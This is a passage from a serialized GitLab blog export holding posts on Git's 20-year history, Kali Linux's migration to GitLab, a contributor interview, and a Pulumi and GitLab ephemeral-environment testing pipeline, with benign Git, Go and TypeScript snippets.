with one another. This is in stark\ncontrast to before, where one had to basically script the merges file by file.\n\n### Remotes\n\nAnother significant change was the introduction of shorthand notation for\nremote repositories. While Git already knew how to talk to remote repositories,\nusers always had to specify the URL to fetch from every single time they wanted\nto fetch changes from it. This was quite unfriendly to the users, because, typically, they wanted to interact with the same remote over and over again.\n\nYou may know about how remotes work now, but the mechanism that existed at  \nthis point in time was still significantly different. There was no `git-remote(1)`  \ncommand that you could use to manage your remotes. Remotes weren't even stored  \nin your `.git/config` file. In fact, when remotes were first introduced in  \nVersion 0.99.2, Git didn't even *have* config files.\n\nInstead, you had to configure remotes by writing a file into the  \n`.git/branches` directory, which nowadays feels somewhat counterintuitive. But  \nthe mechanism still works today:\n\n```shell\n$ git init repo --\nInitialized empty Git repository in /tmp/repo/.git/\n$ cd repo\n$ mkdir .git/branches\n$ echo https://gitlab.com/git-scm/git.git >.git/branches/origin\n$ git fetch origin refs/heads/master\n```\n\nBut that isn't all! The directory was soon renamed in Git Version 0.99.5 to \"remotes\", so there are a total of three different ways to configure remotes in a modern Git client.\n\nMost of you have probably never used either `.git/branches` nor `.git/remotes`,  \nand both of these mechanisms have been deprecated since 2005 and 2011,  \nrespectively. Furthermore, these directories will finally be removed in Git 3.0.\n\n## Git branding\n\nIn 2007, the first Git logo was created. It’s arguable if you can call it a logo, because it only consisted of three red minus signs above three green plus signs, reflecting what the output of `git diff` looks like:\n\n![three red minus signs above three green plus signs, reflecting what the output of `git diff`](https://res.cloudinary.com/about-gitlab-com/image/upload/v1750097388/Blog/Content%20Images/Blog/Content%20Images/image3_aHR0cHM6_1750097387927.png)\n\nA bit later, in 2008, the website [git-scm.com](https://git-scm.com) was launched:\n\n![landing page for git-scm.com in 2006](https://res.cloudinary.com/about-gitlab-com/image/upload/v1750097388/Blog/Content%20Images/Blog/Content%20Images/image4_aHR0cHM6_1750097387930.png)\n\nIn 2012, the Git website was [revamped](https://lore.kernel.org/git/CAP2yMaJy=1c3b4F72h6jL_454+0ydEQNXYiC6E-ZeQQgE0PcVA@mail.gmail.com/) by Scott Chacon and Jason Long. It looks pretty similar to how it looks today:\n\n![git website revamped in 2012](https://res.cloudinary.com/about-gitlab-com/image/upload/v1750097388/Blog/Content%20Images/Blog/Content%20Images/image2_aHR0cHM6_1750097387932.png)\n\nThis site redesign sports the new red-orange logo designed by Jason Long; the same logo that's currently used:\n\n![git logo](https://res.cloudinary.com/about-gitlab-com/image/upload/v1750097388/Blog/Content%20Images/Blog/Content%20Images/image1_aHR0cHM6_1750097387934.png)\n\n## Git 2.0\n\nGit already started to look a lot like modern Git at the 1.0 release, so we\nare going to do a big historical jump to Git 2.0. This version was\nreleased around 10 years after Git 1.0 and was the first release that\nintentionally contained backwards-incompatible changes in central workflows.\n\n### `git-push(1)` default behavior\n\nThe change that arguably caused most the confusion in this release was the\nupdated default behavior of `git-push(1)`.\n\nThere are a couple of different actions that Git could take when you push\ninto a remote repository and don’t specify exactly what you want to push:\n\n- Git could refuse to do anything, asking you to provide more information of\n  what exactly you want to push.\n- Git could push the currently checked out branch.\n- Git could push the currently checked out branch, but only if it knows that it\n  has an equivalent on the remote side.\n- Git could push all of your branches that have an equivalent on the remote side.\n\nThe behavior of modern Git is the so-called \"simple\" strategy, which is the third\noption above. But before Git 2.0, the default behavior was the \"matching\"\nstrategy, which is the last option.\n\nThe “matching” strategy was significantly more risky. You always had to make sure that you\nwere fine with pushing all of your local branches that have an equivalent on the\nremote side before pushing. Otherwise, you might have ended up\npushing changes unintentionally. As such, it was decided to change the strategy\nto \"simple\" to reduce the risk and help out Git beginners.\n\n### `git-add(1)`\n\nAnother big change was the default behavior of `git-add(1)` when it comes to  \ntracked files that have been deleted. Before Git 2.0, `git-add(1)` wouldn't  \nstage deleted files automatically, but you instead had to manually add each  \ndeleted file by using `git-rm(1)` to make them part of a commit. With Git 2.0, this behavior was changed so that `git-add(1)` also adds deleted files to the index.\n\n## Celebrating the Git community\n\nI won’t bore you with the details around how Git works nowadays – you probably use it daily anyway, and, if you don’t, there are many tutorials out there that can help you get started. Instead, let’s celebrate the Git community, which has ensured that Git works as well as it does 20 years later.\n\nOver time, Git has:\n\n- Accumulated 56,721 commits as of the Git 2.49 release.\n- Received contributions from more than 2,000 different individuals.\n- Published 60 major releases.\n\nThe Git project also has a steady influx of new contributors by taking part in [Google Summer of Code](https://summerofcode.withgoogle.com/) and [Outreachy](https://www.outreachy.org/). New contributors like these are what will ensure that the Git project will remain healthy in the long term.\n\nAs such, let me extend a big thank you to all contributors. It is your contributions that have made Git possible.\n\n## Going forward\n\nIt should be an uncontroversial take to say that Git has essentially won the competition of version control systems. It has significant market share, and it isn't easy to find open source projects that are using a version control system other than Git. So it has clearly done a lot of things right.\n\nThat being said, its development hasn't stood still, and there are still many challenges ahead of Git. On the one hand, we have technical challenges:\n- modernization of an aging code base  \n- scaling with the ever-growing size of monorepos  \n- handling large binary files better\n\nAnd on the other hand, there are problems of a more social type:\n- improving the usability of Git  \n- fostering the Git community so that the project remains healthy in the long  \n  term\n\nThere always remains work to be done and we at GitLab are proud to be part  \nof these efforts to make sure that Git continues to be a great version control  \nsystem for the next 20 years.\n\n## Read more about Git\n\n- [Celebrating Git's 20th anniversary with creator Linus Torvalds](https://about.gitlab.com/blog/celebrating-gits-20th-anniversary-with-creator-linus-torvalds/)\n- [What's new in Git 2.49.0?](https://about.gitlab.com/blog/whats-new-in-git-2-49-0/)  \n- [What’s new in Git 2.48.0?](https://about.gitlab.com/blog/whats-new-in-git-2-48-0/)  \n- [A beginner's guide to the Git reftable format](https://about.gitlab.com/blog/a-beginners-guide-to-the-git-reftable-format/)",[9,751],{"slug":3504,"featured":91,"template":689},"journey-through-gits-20-year-history","content:en-us:blog:journey-through-gits-20-year-history.yml","Journey Through Gits 20 Year History","en-us/blog/journey-through-gits-20-year-history.yml","en-us/blog/journey-through-gits-20-year-history",{"_path":3510,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":3511,"content":3516,"config":3522,"_id":3524,"_type":14,"title":3525,"_source":16,"_file":3526,"_stem":3527,"_extension":19},"/en-us/blog/kali-linux-movingtogitlab",{"title":3512,"description":3513,"ogTitle":3512,"ogDescription":3513,"noIndex":6,"ogImage":2556,"ogUrl":3514,"ogSiteName":673,"ogType":674,"canonicalUrls":3514,"schema":3515},"Kali Linux: Growing Community Contributions with GitLab","Since moving to GitLab in 2019, Kali Linux has gone from company-only contributions to a growing number of community contributions.","https://about.gitlab.com/blog/kali-linux-movingtogitlab","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"How GitLab helped Kali Linux attract a growing number of community contributions\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Nuritzi Sanchez\"}],\n        \"datePublished\": \"2021-02-18\",\n      }",{"title":3517,"description":3513,"authors":3518,"heroImage":2556,"date":3519,"body":3520,"category":10,"tags":3521},"How GitLab helped Kali Linux attract a growing number of community contributions",[2773],"2021-02-18","[Kali Linux](https://www.kali.org/) is a well-loved Debian-based Linux distribution aimed at advanced [Penetration Testing](https://en.wikipedia.org/wiki/Penetration_test) and Security Auditing. We sat down with Ben Wilson ([@g0tmi1k](https://twitter.com/g0tmi1k)), senior developer at Kali, to hear more about why Kali Linux moved to GitLab and see if they've noticed any changes to their project since adopting GitLab as their DevOps solution.\n\n## Why did you decide to move to GitLab?\n\nWe decided to move from Gitolite to GitLab around April 2019 to make it possible for our community to contribute to Kali. Our previous setup didn't allow anyone to sign up, so the community couldn't help out. Another complication was using a mixture of services such as Google Docs and Phabricator, and we wanted to condense our tool stack. We love that GitLab is a single platform for the whole software development lifecycle.\n\n>> One thing that was important for us is that we didn't want to reinvent the wheel. We tried to choose something open-source with advanced functionality, an active community, and a company behind it. GitLab ticked every box.\n\nAnother factor for our decision was that [GitLab's API is significantly more feature-rich than competitor APIs](https://docs.gitlab.com/ee/api/), which allowed us to automate and integrate into anything that we wanted. For example, we can fully automate the process of remotely forking a repository then apply our configurations.\n\nThat way, we don't have to download a git repository only to push it up again. This is a big time-saver for us and significantly simplifies the workflow. Some of the configuration that we can now automatically apply are:\n\n * Being able to drop the relationship between forks\n * Configure the default branch\n * Disable unused features for a repository (e.g., not everything requires their own wiki)\n * Populate a description for the repository\n * Set up CI paths\n * Set up email notification on any activity to our private mailing list\n\nWe take advantage of various open source tools that leverage GitLab's API, such as [Debian Salsa](https://www.phoronix.com/scan.php?page=news_item&px=Debian-Salsa-Beta). We can use these tools to automate things like updates to email distribution lists and our configuration of GitLab admin settings and repository structure. We contribute any changes we make to these tools back upstream so that other communities can leverage GitLab's API's power the way we do.\n\nAn additional perk to GitLab is its usability. The way you can organize projects makes it a more intuitive experience for people who want to contribute. For example, having sub-groups and projects allows us to keep a clean layout in a folder-like structure. For those interested, you can see how we've organized the [Kali project in GitLab](https://gitlab.com/kalilinux).\n\n## How are you using GitLab at Kali Linux?\n\nWe're using GitLab's [top-tier SaaS version](/pricing/), which is hosted on GitLab.com, thanks to the [GitLab for Open Source program](/solutions/open-source/). Using this version and hosting it on GitLab is easier for us because it's less infrastructure to maintain. We have many unique pieces of infrastructure so it's nice to reduce the load when we can. We're using a wide range of features to manage the entire Kali Linux project, consisting of 564 active repositories.\n\nSome of the most essential [GitLab features](/pricing/feature-comparison/) for us are:\n\n*   **Source Code Management**: We're using GitLab to host the source code to all our packages and build scripts and custom tools.\n*   **[Wiki](https://docs.gitlab.com/ee/user/project/wiki/#wiki)**: We use the wiki functionality for internal documentation. Markdown makes it easy for everyone to contribute.\n*   **[Project management](/solutions/agile-delivery/)**: We track tasks and short/long term goals with GitLab as well as the timelines for our project. We use issue tracking, threads, labels, milestones, weights, and everything else designed for project management.\n*   **[User Permissions](https://docs.gitlab.com/ee/user/permissions.html#permissions)**: We like the functionality of GitLab's user permissions, which allows us to have \"one-off\" users on specific projects as well as automatic expiration after a particular time.\n*   **[Security](https://docs.gitlab.com/ee/user/application_security/)**: As a cybersecurity-focused Linux distro, security is paramount to us. We like that [GitLab has 2FA and project access tokens](https://docs.gitlab.com/ee/security/).\n*   **[Analytics](https://docs.gitlab.com/ee/user/analytics/)**: We are still discovering the functionality here, but we like seeing user statistics around code review and contribution.\n*   **Performance**: We're able to use GitLab's [Content Delivery Network (CDN)](https://en.wikipedia.org/wiki/Content_delivery_network) for great performance across the globe.\n\nWe're hoping to leverage [GitLab's CI/CD features](/solutions/continuous-integration/) and the [container management capabilities](https://docs.gitlab.com/ee/user/packages/container_registry/) more regularly in the near future.\n\nWe're also looking to use [GitLab Pages](https://docs.gitlab.com/ee/user/project/pages/) for hosting our website instead of our self-hosted WordPress instance. By using [Hugo](https://gohugo.io/hosting-and-deployment/hosting-on-gitlab/), we can write the content with a mixture of HTML and Markdown. Hugo makes it very simple, easy to update, and has straightforward change tracking. GitLab Pages then can serve up the [static output](https://docs.gitlab.com/ee/user/project/web_ide/index.html).\n\nThere were several problems we were facing with WordPress that made us consider moving away, such as plugins that weren't properly maintained, security issues that made us require VPN access to admin pages. The other benefits to the move are that static pages will load faster, and our community can help fix typos on our website through merge requests. Once we make the move to GitLab Pages, we'll start to make greater use of GitLab's CI/CD functions to statically generate the websites.\n\nAnother thing we're becoming more familiar with is all of GitLab's project management features. One of the reasons we chose GitLab instead of other DevOps tools is that it's a single platform for the whole software development lifecycle, and we're looking to use more of its features. Since we're on the top-tier SaaS plan, we have every functionality available to us and we're eager to make use of it.\n\n## What are some of the changes you've noticed in your open-source community since starting to use GitLab?\n\nThe most significant change is that we only allowed contributions from employees before moving to GitLab. Since the switch to GitLab, we've adopted a new mindset and now allow anyone to help out.\n\n>> GitLab's user-friendly design has made it easy for our community to get started, and we've started to receive merge requests from the public as well as bug reports and bug fixes.\n\nIt's been exhilarating to see these contributions land! We are working on increasing these contributions in 2021 with a \"Kali Summer of Code\" and are considering doing a giveaway for people who have made a significant contribution.\n\nWe've also experienced changes to our development practices. For example, we can now have more effective discussions about commit differences and can link to individual commits to pinpoint problems. It's easier to update items from the internal wiki, edit web pages, and merge requests. I also like that GitLab has a built-in automatic save feature to help when you're drafting something and either multitasking or on-the-go.\n\nFinally, GitLab's to-dos and long-term planning features allow us to plan ahead for the future of Kali development. For example, we've replaced ad-hoc solutions done by individuals via emails and to-do list text files on each person's computer since moving to GitLab.\n\n## What are some challenges you've had with implementing GitLab for your community? How did you overcome those challenges?\n\nDuring the switchover from the old system to GitLab, we discovered various things that were hardcoded.\n\nTo help with this, we automated a find and replace, and followed up with various manual searches to ensure that all links and references were located. This ended up taking about two hours. We also left the old web server up for a year, which pointed to the new URL structure to ensure that there weren't any missing links and references. We redid the layout of the site, so it took a while to recreate all the redirects.\n\nAnother challenge was the sheer size of Kali. We had to import roughly 1,000 repositories when we set up GitLab. We managed to migrate most of them in a day and completed the migration within a week once we managed to get the group structure in place. We set up separate groups for different access levels to repositories for build scripts, internal non-public files, Android, phone, build scripts, store, packages, recipes, tools, and websites.\n\nImporting other items (code packages, build scripts, and custom tools from our self-hosted git) took longer because they were in many different formats. When we did the import we cleaned up to determine which items were no longer in use and archived them. The next step was making sure our custom tools were hosted on GitLab and then configuring the tools and packages appropriately. Next, we imported several repositories. We also needed to create files that were not previously tracked in our repository. Finally, we converted our WordPress-based content to Markdown using an [open source project](https://github.com/lonekorean/wordpress-export-to-markdown), then manually verified and cleaned it up.\n\nWe chose not to carry over existing issues because we wanted to have a clean start. In general, we only imported what was important. Everything we ended up with is what we cared about and what we wanted to track.\n\n## What do you think GitLab is doing well in supporting open source communities, and what should GitLab do to improve in this area?\n\nWe really like that GitLab has an outreach program for open source projects with dedicated people for the job role. They actively contacted us to become a [GitLab Open Source Partner](/solutions/open-source/partners/) and we're glad to have joined as one!\n\nOne of the things that we appreciate about GitLab is that the company is open source. The transparency that comes with that allows us, and anyone else, to see the company's progress. GitLab is setting an example for how open source companies can work alongside their communities, and it's something we are learning from too.\n\n## What advice would you have for other open source communities that are looking to implement GitLab?\n\nThe sooner you make the switch, the easier and better! Once you move, you'll see that it's less work to maintain and there are more features to use.\n\nWhen beginning your migration, make sure to set up a test project first to help plan the structure ahead of doing the main project switch. Look up and explore features ahead of time so you know what GitLab can do rather than discover the functionality when using it. GitLab has a [GitLab Learn portal](/learn/), which we hear is going to continue to be improved to help with user education.\n\n## What are some of the new things on the horizon for Kali Linux?\n\n*   [KaBoxer](https://gitlab.com/kalilinux/tools/kaboxer): A framework to manage applications in containers on Kali\n*   New kali.org website using GitLab Pages\n*   Programs to increase community contributions to Kali\n\n## Is there anything else you'd like to share with us that we haven't asked you?\n\nWe have only scratched the surface of what GitLab has offered - and they keep putting in more features. We are planning on taking their upcoming training to make sure we are fully up-to-date on their offerings.\n\n## Last but certainly not least, we have heard a rumor that the founders of Kali are so dedicated to the project that they have Kali logo tattoos. Is this true?\n\nVery true! The original founders both have Kali tattoos, as do various current members.\n\nWe also have some pretty cute baby onesies that are a hit.\n\n![A baby in a Kali Linux onesie](https://about.gitlab.com/images/blogimages/kali_linux_baby.jpg){: .shadow.medium.center}\nKali Linux has some cute baby onesies. [CC BY-SA 4.0](https://creativecommons.org/licenses/by-sa/4.0/) Ben Wilson\n{: .note.text-center}\n\n## About Kali Linux\n\n[Kali Linux](https://www.kali.org/) (formerly known as BackTrack-Linux) is a Debian-based Linux distribution aimed at advanced Penetration Testing and Security Auditing. Kali Linux contains several hundred tools targeted toward various information security tasks, such as Penetration Testing, Forensics, and Reverse Engineering. Kali Linux is a multi platform solution, accessible and freely available to information security professionals and hobbyists.\n",[9,267,910],{"slug":3523,"featured":6,"template":689},"kali-linux-movingtogitlab","content:en-us:blog:kali-linux-movingtogitlab.yml","Kali Linux Movingtogitlab","en-us/blog/kali-linux-movingtogitlab.yml","en-us/blog/kali-linux-movingtogitlab",{"_path":3529,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":3530,"content":3535,"config":3540,"_id":3542,"_type":14,"title":3543,"_source":16,"_file":3544,"_stem":3545,"_extension":19},"/en-us/blog/katrin-contributor-post",{"title":3531,"description":3532,"ogTitle":3531,"ogDescription":3532,"noIndex":6,"ogImage":1192,"ogUrl":3533,"ogSiteName":673,"ogType":674,"canonicalUrls":3533,"schema":3534},"Meet GitLab Contributor Katrin Leinweber","Katrin Leinweber shares her experience contributing to GitLab documentation and translations.","https://about.gitlab.com/blog/katrin-contributor-post","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"Meet GitLab Contributor Katrin Leinweber\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Ray Paik\"}],\n        \"datePublished\": \"2019-07-17\",\n      }",{"title":3531,"description":3532,"authors":3536,"heroImage":1192,"date":3537,"body":3538,"category":10,"tags":3539},[704],"2019-07-17","\n\nFor this edition of the [GitLab contributor blog posts](/blog/tags.html#contributors), I'm\nexcited to introduce [Katrin Leinweber](https://gitlab.com/katrinleinweber). Let's get to know more about her!\n\n### Can you tell us where you live and what you like about your area?\n\nI live in [Hanover, Germany](https://www.google.com/maps/place/Hanover,+Germany/@52.3815678,9.6148482,10.97z/data=!4m5!3m4!1s0x47b00b514d494f85:0x425ac6d94ac4720!8m2!3d52.3758916!4d9.7320104),\nwhich is transitioning from a car manufacturing hub to a more modern and diversified city.\nThe city is reasonably bicycle friendly with large parks and gardens, which are worth a visit.\nI don't find Hanover too touristy, which is probably a plus for us citizens.\n\n### How long have you used GitLab and why did you want to make a contribution?\n\nI started using GitLab CE at my university in April 2015 as a backup server for my PhD thesis,\ndata analysis scripts, etc. [My first merge request](https://gitlab.com/gitlab-com/www-gitlab-com/merge_requests/6531)\nwas simply fixing a typo in a blog post.\n\n### You also help translating GitLab into German. How is that different from making contributions via MRs and why is translating GitLab important to you?\n\nLocalization is one of the tasks that got me into contributing to open source software projects in general.\nEven though I myself don't need a localized UI, I think it's valuable to many people to be able to\nuse a complex software in their native language. Since I think that GitLab has\n[valuable uses beyond programming](https://openbiblio.social/@katrinleinweber/102258903864249981),\nI hope lowering the barrier to entry for non-programmers will help support those use cases.\nAlso for me, doing quick translations is a sort of productive procrastination.\n\n![Canoeing on Hanover's river Leine (image credit Corinna John, [NABU Laatzen](https://www.nabu-laatzen.de/)](https://about.gitlab.com/images/blogimages/Katrin_Leinweber.jpg){: .shadow.medium.center}\nCanoeing on Hanover's river Leine\n{: .note.text-center}\n\n### What has been your experience contributing to GitLab?\n\nTechnically, it's pretty straightforward and something people should be familiar with if\nthey've contributed to other projects or used tools like GitHub. Every time I contribute,\nI feel like I'm living (in) the future where projects allow people to change something of theirs.\n\nHowever, we shouldn't forget that \"No, this Wiki page is only editable by colleagues in the XYZ department\"\nis still the default in so many work environments. So the future isn't quite here for everyone yet.\n\nOne of the things that bothers me about GitLab's contribution process is the fact that even simple changes\n– like documentation updates – get pushed into the same CI pipeline as code changes in many cases.\nIt seems like a waste of electricity. Maybe not in terms of absolute kWh, but since the risk of anything\nbreaking due to a typo fix or an updated hyperlink is almost zero, those kWh are effectively wasted.\nThere should be a smarter way to minimize human effort in preventing build breakages than to use\nmore CPU cycles for testing. We all know that humanity can't afford to waste resources anymore.\n\nIn that vein, I wouldn't mind seeing GitLab also supporting the renewable energy industry as\nI don't see that listed in the\n[market segmentation page](/handbook/marketing/strategic-marketing/market-segmentation/#oil--gasenergy) yet.\n\n### Do you participate in other open source projects? If yes, what do you like about other communities and what are some of the things that GitLab can learn?\n\nI do, for example in [The Carpentries](https://carpentries.org/teach/), which provides Open Educational\nResources and basic programming training for researchers. I find the GitLab community is\nquite thoughtful about sharing what they learn about successfully pushing the product and\nthe company forward. So I think other open source projects will find lots of advice in GitLab's\nblog and handbook that is worth considering.\n\n### What do you like to do when you're not working?\n\nI enjoy gardening and going cycling, hiking, and canoeing.\n\n### Anything else you want to share with the community?\n\nWherever appropriate, use [`[skip ci]`](https://docs.gitlab.com/ee/ci/pipelines/#skip-a-pipeline)\nmore often in your commit messages and MR titles.\n\n## Interested in learning how you can contribute?\n\nA good place to start is the [Contributing to GitLab page](/community/contribute/), where you can\nlearn how you can contribute to GitLab code, documentation, translation, and UX design.\n\nIf you have any questions, you are always welcome to reach me at rpaik@gitlab.com.\n\n_Note: This post is part of [a series featuring people who contribute to GitLab](/blog/tags.html#contributors)._\n",[267,9,708],{"slug":3541,"featured":6,"template":689},"katrin-contributor-post","content:en-us:blog:katrin-contributor-post.yml","Katrin Contributor Post","en-us/blog/katrin-contributor-post.yml","en-us/blog/katrin-contributor-post",{"_path":3547,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":3548,"content":3553,"config":3559,"_id":3561,"_type":14,"title":3562,"_source":16,"_file":3563,"_stem":3564,"_extension":19},"/en-us/blog/kubecon-na-2019-are-you-about-to-break-prod",{"title":3549,"description":3550,"ogTitle":3549,"ogDescription":3550,"noIndex":6,"ogImage":1211,"ogUrl":3551,"ogSiteName":673,"ogType":674,"canonicalUrls":3551,"schema":3552},"KubeCon NA: Are you about to break Prod?","Use Pulumi and GitLab to build a pipeline that validates your application, infrastructure, and deployment process.","https://about.gitlab.com/blog/kubecon-na-2019-are-you-about-to-break-prod","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"KubeCon NA: Are you about to break Prod?\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Erin Krengel, Pulumi\"}],\n        \"datePublished\": \"2020-01-27\",\n      }",{"title":3549,"description":3550,"authors":3554,"heroImage":1211,"date":3556,"body":3557,"category":10,"tags":3558},[3555],"Erin Krengel, Pulumi","2020-01-27","\n\nA couple of months ago, my [Pulumi](https://www.pulumi.com/) colleague Sean Holung, staff sofware engineer, and I had the opportunity to present [\"Are you about to break prod? Acceptance Testing with Ephemeral Environments\"](https://www.youtube.com/watch?v=jAQhDZiRzBQ) at KubeCon NA 2019. In this talk, we covered what is an ephemeral environment, how to create one, and then we walked the audience through a concrete example. Given our limited time, we had to move quickly through a ton of information. This post will recap our presentation and add a few more details we weren't able to cover.\n\nAs software engineers, our job is to deliver business value. To do this, we need to be delivering software both quickly and reliably.\n\nSo the question we ask you is: are you about to break prod? Everyone will break production at some point because there are things we miss. As independent software lead Alexandra Johnson sums up so well in a tweet: \"Failures are part of the cost of building and shipping large systems.\" Building a robust pipeline allows us to move quickly in the case of failure and gain confidence around making changes to our infrastructure and applications.\n\n{::options parse_block_html=\"false\" /}\n\n\u003Cdiv class=\"center\">\n\n\u003Cblockquote class=\"twitter-tweet\">\u003Cp lang=\"en\" dir=\"ltr\">Big takeaway from \u003Ca href=\"https://twitter.com/hashtag/KubeCon?src=hash&amp;ref_src=twsrc%5Etfw\">#KubeCon\u003C/a>: none of us want to break prod, but failures are part of the cost of building and shipping large systems. Using tools like \u003Ca href=\"https://twitter.com/hashtag/AcceptanceTesting?src=hash&amp;ref_src=twsrc%5Etfw\">#AcceptanceTesting\u003C/a> (\u003Ca href=\"https://twitter.com/eckrengel?ref_src=twsrc%5Etfw\">@eckrengel\u003C/a>) and \u003Ca href=\"https://twitter.com/hashtag/ChaosEngineering?src=hash&amp;ref_src=twsrc%5Etfw\">#ChaosEngineering\u003C/a> (\u003Ca href=\"https://twitter.com/Ana_M_Medina?ref_src=twsrc%5Etfw\">@Ana_M_Medina\u003C/a>) can increase your confidence in your infrastructure changes!\u003C/p>&mdash; Alexandra Johnson (@alexandraj777) \u003Ca href=\"https://twitter.com/alexandraj777/status/1198373475049623552?ref_src=twsrc%5Etfw\">November 23, 2019\u003C/a>\u003C/blockquote> \u003Cscript async src=\"https://platform.twitter.com/widgets.js\" charset=\"utf-8\">\u003C/script>\n\n\u003C/div>\n\nWith this in mind, we use Pulumi and GitLab to build a pipeline that validates both our application, infrastructure, and deployment process. \n\n## Ephemeral environments\n\nWhat is an ephemeral environment? It is a short-lived environment that mimics a production environment. To maintain agility, boundaries are defined in the environment to only encompass the first-level dependencies of the particular microservice that is being deployed. It means you don't have to spin up every single microservice or piece of infrastructure that's running in production. Yet you may need to spin up extra pieces of infrastructure to properly test the microservice. For example, you may need to create a subscription to pull from a PubSub topic your microservice writes to. This subscription would allow your acceptance tests to pull from a topic in order to validate an outbound message is published.\n\n## Why this is important\n\nInfrastructure is a key part of an application's behavior. The architecture and requirements are continually evolving. How can you incorporate these into a testing suite to give us a high degree of confidence?\n\nEphemeral environments allow you to integrate infrastructure and deployment processes into a testing suite. They ensure your testing environment is always in-sync with production and therefore allow you to iterate quickly to meet new requirements.\n\nEphemeral environments also encourage you to lean on automated tests over manual tests. If you use ephemeral environments as a replacement for a testing environment, there is not enough time to go in and run a manual check. Shifting your mindset to automated tests can be challenging, yet it's imperative that we do so. Automated tests guarantee your application behaves as expected today as well as months from now when you're out on vacation.\n\n## Our demo application\n\nTo demonstrate the effectiveness of integrating acceptance testing with ephemeral environments into your deployment process, we created a simple demo application. The service is written in Go and accepts a message on the `/message` endpoint, then places it in a storage bucket and sends a notification about the new object on a PubSub topic. The code for this application lives in our [main.go](https://gitlab.com/rocore/demo-app/blob/master/main.go) file. While you can walk through this code yourself, the most important thing to call out is that our application is *configurable*. This means we take configuration in at the very beginning of our main function and shut down the application if the values are not present.\n\n```go\nfunc main() {\n    ...\n\t// Get configuration from environment variables. These are\n\t// required configuration values, so we use an helper\n\t// function get the values and exit if the value is not set.\n\tproject := getConfigurationValue(\"PROJECT\")\n\ttopicName := getConfigurationValue(\"TOPIC\")\n\tbucketName := getConfigurationValue(\"BUCKET\")\n    ...\n}\n\nfunc getConfigurationValue(envVar string) string {\n\tvalue := os.Getenv(envVar)\n\tif value == \"\" {\n\t\tlog.Fatalf(\"%s not set\", envVar)\n\t}\n\tlog.Printf(\"%s: %s\", envVar, value)\n\treturn value\n}\n```\n\n### Infrastructure\n\nThere are many pieces of infrastructure to spin up and we can use Pulumi to easily wire it all together. Our architecture looks like this:\n\n![Pulumi Architecture](https://about.gitlab.com/images/blogimages/pulumidemoarch.jpg){: .medium.center}\n\nYou can check out the Pulumi code that we use to reproduce both our ephemeral environments as well as production in the [infrastructure/index.ts](https://gitlab.com/rocore/demo-app/blob/master/infrastructure/index.ts) file. The neat thing about using Pulumi is that we can create the Google Cloud Platform (GCP) resources we need and then directly reference them in our Kubernetes deployment. Using Pulumi ensures we're always configuring our application with the correct GCP resources for that environment.\n\nFor example, in our Kubernetes deployment, we set the environment variables by using the topic and bucket variables created just above.\n\n```typescript\n// Create a K8s Deployment for our application.\nconst appLabels = { appClass: name };\nconst deployment = new k8s.apps.v1.Deployment(name, {\n    metadata: { labels: appLabels },\n    spec: {\n        selector: { matchLabels: appLabels },\n        template: {\n            metadata: { labels: appLabels },\n            spec: {\n                containers: [{\n                    ...\n                    env: [\n                        { name: \"TOPIC\", value: topic.name }, // referencing topic just created\n                        { name: \"BUCKET\", value: bucket.name }, // referencing bucket just created\n                        { name: \"PROJECT\", value: project },\n                        {\n                            name: \"GOOGLE_APPLICATION_CREDENTIALS\",\n                            value: \"/var/secrets/google/key.json\"\n                        },\n                    ],\n                    ...\n                }]\n            }\n        }\n    },\n});\n```\n\n### Acceptance tests\n\nThe acceptance tests validate that our service, when stood up, functions as expected. They are run against an ephemeral environment. The tests live in the `acceptance/acceptance_test.go` [file](https://gitlab.com/rocore/demo-app/blob/master/acceptance/acceptance_test.go). You'll notice we're once again using the helper function `getConfigurationValue`. Our acceptance test must also be configured to ensure they're validating against the correct resources for that particular ephemeral environment.\n\nSince the service is only accessible from within the Kubernetes cluster, we use a Kubernetes job to run our acceptance tests. Using a Kubernetes job is a good technique to use when your CI is running externally, such as from GitLab, and you do not want to expose your service publicly. Our ephemeral environment plus acceptance test looks like this:\n\n![Acceptance Tests](https://about.gitlab.com/images/blogimages/pulumiacceptancetestarch.jpg){: .medium.center}\n \nWe spin up a Kubernetes Job and additional resources by using an if statement at the bottom of our `infrastructure/index.ts` file. The conditional depends on the environment's name as follows:\n\n```typescript\n// If it's a test environment, set up acceptance tests.\nlet job: k8s.batch.v1.Job | undefined;\nif (ENV.startsWith(\"test\")) {\n    job = acceptance.setupAcceptanceTests({\n        ...\n    });\n}\n\n// Export the acceptance job name, so we can get the logs from our\n// acceptance tests.\nexport const acceptanceJobName = job ? job.metadata.name : \"unapplicable\";\n```\n\nThat covers all the major aspects of our application and infrastructure, and if you'd like to view the code in detail, it is available in our `demo-app` [GitLab repository](https://gitlab.com/rocore/demo-app).\n\n## Our pipeline\n\nWhen developing a new service, we must establish a solid deployment strategy upfront. We want to make sure we're building in quality from day one. As we develop the service, we can add acceptance tests for every feature we add while the context and requirements are still fresh in our minds. This ensures we have thorough coverage of our app's functionality.\n\nWe used GitLab to set up our pipeline. We chose GitLab because it's straightforward to set up and allows us to run our pipeline on our Docker image of choice. We use a [base-image](https://gitlab.com/rocore/global-infra/blob/master/base-image/Dockerfile) that has all our dependencies installed and then reference that Docker image and tag in our `demo-app` pipeline. The Docker image allows us to bundle and version the dependencies for building our application and infrastructure.\n\n![GitLab Pipelines](https://about.gitlab.com/images/blogimages/pulumibloggitlabci.png){: .shadow.medium.center}\n \n1. **Test and Build** - This runs our unit tests and builds both our application and acceptance test images. To build our images, we used [Kaniko](https://github.com/GoogleContainerTools/kaniko), a tool for building images within a container or Kubernetes cluster. GitLab has excellent documentation on [how to incorporate Kaniko](https://docs.gitlab.com/ee/ci/docker/using_kaniko.html) into your pipeline. The application image is an immutable image that is used for both running our acceptance tests and deploying to production.\n1. **Acceptance Test** - This is what spins up our ephemeral environments and runs our acceptance tests. This acts as a quality gate catching issues before production.\n\n    Our ephemeral environment and Kubernetes job are all spun up in the `script` portion of the acceptance test job definition. We do a bit of setup for our new acceptance test stack and then run `pulumi up`. Here is the print out from our acceptance tests.\n\n    ```bash\n    ...\n    $ 